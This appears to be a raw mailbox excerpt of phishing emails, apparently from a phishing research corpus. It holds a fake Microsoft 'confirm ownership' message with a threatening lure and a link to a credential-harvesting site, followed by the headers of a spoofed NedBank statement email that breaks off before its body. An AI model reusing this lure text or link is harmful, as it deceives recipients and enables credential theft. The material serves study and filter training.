From: update@microsoft.com
Date: Thu, 27 Sep 2018 05:04:07 +0000
Status: O
X-Status: 
X-Keywords:                  
X-UID: 593

You will not see this in a MIME-aware mail reader.
--===============0019108603==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

Dear user Please complete ownership confirmation to verify and re-validate =
account ownership,and securely upgrade to a more secured platform Confirm o=
wnership Microsoft will not be responsible for any online theft,or mail mal=
function after this warning and no verfication response Best Regards, 2018 =
=A9 Secured Data. =

---------------------------------------------------------------------------=
---------------- Please do not reply to this email. This auto-mailbox is no=
t monitored and you will not receive a response.
--===============0019108603==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head>
<meta http-equiv=3D"Content-Language" content=3D"en-us">
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859-=
1">
<title>New Page 3</title>
<style>
<!--
*{text-indent:0 !important}*{text-indent:0 !important}*{text-indent:0 !impo=
rtant}*{text-indent:0 !important}*{text-indent:0 !important}*{text-indent:0=
 !important}*{text-indent:0 !important}*{text-indent:0 !important}*{text-in=
dent:0 !important}-->
</style>
</head>

<body><DIV style=3D"PADDING-BOTTOM: 10px; TEXT-INDENT: 0px">Dear user</DIV>
<DIV style=3D"PADDING-BOTTOM: 10px; TEXT-INDENT: 0px">Please complete owner=
ship confirmation to verify and re-validate account ownership,and securely =
upgrade to a more secured platform</DIV>
<DIV style=3D"MAX-WIDTH: 200px; PADDING-BOTTOM: 10px; TEXT-ALIGN: center; P=
ADDING-TOP: 10px; PADDING-LEFT: 10px; PADDING-RIGHT: 10px; BACKGROUND-COLOR=
: #0078d7; TEXT-INDENT: 0px"><A style=3D"TEXT-DECORATION: none; FONT-FAMILY=
: Boing-Bold,Arial Black,sans-serif; COLOR: white; TEXT-INDENT: 0px" href=
=3D"http://loan.deprixashipping.ml/asampete/index.php?email=3Djose@monkey.o=
rg">Confirm ownership</A></DIV>
<DIV style=3D"PADDING-BOTTOM: 10px; PADDING-TOP: 10px; TEXT-INDENT: 0px">Mi=
crosoft will not be responsible for any online theft,or mail malfunction af=
ter this warning and no verfication response</DIV>
<DIV style=3D"PADDING-BOTTOM: 10px; TEXT-INDENT: 0px">Best Regards,</DIV>
<DIV style=3D"PADDING-BOTTOM: 10px; TEXT-INDENT: 0px">2018 =A9 Secured Data=
. <BR style=3D"TEXT-INDENT: 0px !important">-------------------------------=
------------------------------------------------------------</DIV>
<DIV style=3D"PADDING-BOTTOM: 10px; TEXT-INDENT: 0px">Please do not reply t=
o this email. This auto-mailbox is not monitored and you will not receive a=
 response.</DIV></BODY></HTML>
--===============0019108603==--

From jose@monkey.org Thu Sep 27 02:17:55 2018 +0000
Return-Path: statement@nedbank.co.za
Delivered-To: jose@monkey.org
X-FDA: 74654578110.27.cork44_622f6bdae452c
X-Spam-Summary: 2,0,0,5ee56d607b728ef9,d41d8cd98f00b204,statement@nedbank.co.za,:statement@nedbank.co.za,RULES_HIT:41:72:152:379:421:455:474:527:677:871:962:967:969:973:978:983:988:989:1147:1189:1208:1254:1256:1260:1261:1263:1313:1314:1381:1394:1395:1431:1432:1433:1434:1436:1437:1516:1517:1518:1546:1547:1550:1555:1571:1575:1588:1592:1594:1685:1730:1764:1777:1792:2194:2196:2198:2199:2200:2201:2525:2551:2559:2568:2610:2612:2682:2685:2693:2737:2790:2859:2890:2892:2894:2895:2898:2900:2903:2915:2922:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3148:3355:3770:3865:3866:3867:3868:3870:3871:3872:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4250:4321:4552:4700:5007:6119:6261:6284:6354:6669:6688:6703:6748:7281:7652:7689:8512:8516:8518:8599:8603:8660:8829:8885:8957:9025:9059:9121:9131:9149:9388:9411:9416:9901:9908:10004:10049:10079:10265:10346:10394:11026:11233:11529:11604:11657:11658:11855:11914:12043:12050:12051:12217:12219
X-HE-Tag: cork44_622f6bdae452c
X-Filterd-Recvd-Size: 121890
Received: from mail.salmo.ua (mail.salmo.ua [80.70.74.99])
	by imf05.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 27 Sep 2018 02:17:54 +0000 (UTC)
Received: from [192.168.1.7] (unknown [187.66.33.120])
	by mail.salmo.ua (Postfix) with ESMTPA id 5E9B75597E;
	Thu, 27 Sep 2018 00:06:38 +0300 (EEST)
Content-Type: multipart/mixed; boundary="===============0354501252=="
MIME-Version: 1.0
Subject: NedBank Account Statement - 18-09-26
To: you <statement@nedbank.co.za>
List-Unsubscribe: bla bla bla
